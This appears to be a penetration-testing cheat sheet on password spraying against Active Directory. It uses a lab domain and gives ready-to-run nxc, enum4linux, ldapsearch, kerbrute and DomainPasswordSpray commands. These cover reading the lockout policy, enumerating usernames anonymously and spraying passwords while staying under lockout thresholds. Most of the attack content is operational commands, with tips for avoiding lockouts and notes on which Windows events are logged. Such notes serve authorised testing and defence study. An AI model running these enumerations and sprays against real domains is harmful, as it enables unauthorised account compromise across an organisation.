Password Spraying Attack
Try one password against every user, then wait: with at most one failed attempt per user per observation window the lockout threshold is never reached, unlike brute-forcing a single account.
Password Policy
Obtain the password policy before spraying. The values that matter:
Lockout threshold
Number of failed attempts (badPwdCount) that locks the account; 0 means accounts never lock
Lockout duration
How long the account stays locked; 0 means an administrator has to unlock it
Lockout observation window
Minutes after the last failed attempt before badPwdCount resets to 0; spray fewer passwords than the threshold per window, then wait a full window before the next round
Locally
Remotely
nxc smb <IP> -u <USER> -p <PASS> --pass-pol
enum4linux -u <USER> -p <PASS> -P <IP>
Null Session SMB
nxc smb <IP> --pass-pol
enum4linux -P <IP>
LDAP Anonymous Binds
e.g. for the domain INLANEFREIGHT.LOCAL (base DN DC=INLANEFREIGHT,DC=LOCAL):
ldapsearch -h <IP> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
Find Usernames
Locally
Remotely
nxc smb <IP> -u <USER> -p <PASS> --users
enum4linux -u <USER> -p <PASS> -U <IP>
Null Session SMB
nxc smb <IP> --users
enum4linux -U <IP>
LDAP Anonymous Binds
e.g. for the domain INLANEFREIGHT.LOCAL (base DN DC=INLANEFREIGHT,DC=LOCAL):
ldapsearch -h <IP> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f 2 -d " "
windapsearch.py --dc-ip <IP> -u "" -U
Brute Force
Enumerate valid usernames through Kerberos pre-authentication: the KDC answers an AS-REQ differently for unknown and existing principals before any password is involved, so this neither increments badPwdCount nor produces 4625 failed-logon events (it is still visible to Kerberos Authentication Service auditing as 4768 events with failure code 0x6, if that auditing is enabled).
kerbrute userenum -d <DOMAIN> --dc <IP_DC> <WORDLIST>
Spraying Attack
kerbrute verifies each credential by requesting a TGT: it sends an AS-REQ for the user with the password-derived key and reads the reply, an AS-REP for a valid password or a pre-authentication failure otherwise. Each attempt is one request out and one reply back over UDP, so it is fast and avoids SMB traffic, but every failure still increments badPwdCount (logged as 4771 rather than 4625) and counts toward the lockout threshold.
kerbrute passwordspray -d <DOMAIN> --dc <DC_IP> <USERS_LIST> <PASS>
Remove from the user list the accounts kerbrute flags with errors (disabled, locked or unknown principals) so they are not sprayed again in later rounds.
Spraying over SMB with nxc: each attempt is a full NTLM authentication against the target (more traffic, slower, and every failure is logged on the DC as a failed logon). Several passwords can be given, but each one is tried against every user in the list, so pass no more passwords per run than the observation window allows.
nxc smb <IP> -u <USERS_LIST> -p <PASS1> <PASS2> -d <DOMAIN> --continue-on-success | grep +
From a domain-joined Windows host with DomainPasswordSpray: run without -UserList it queries the domain for the user list itself (dropping disabled accounts and accounts whose badPwdCount is close to the threshold), reads the domain password policy and warns about the observation window before spraying.
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password <PASS> -ErrorAction SilentlyContinue [-UserList <USERS> -Domain <DOMAIN>]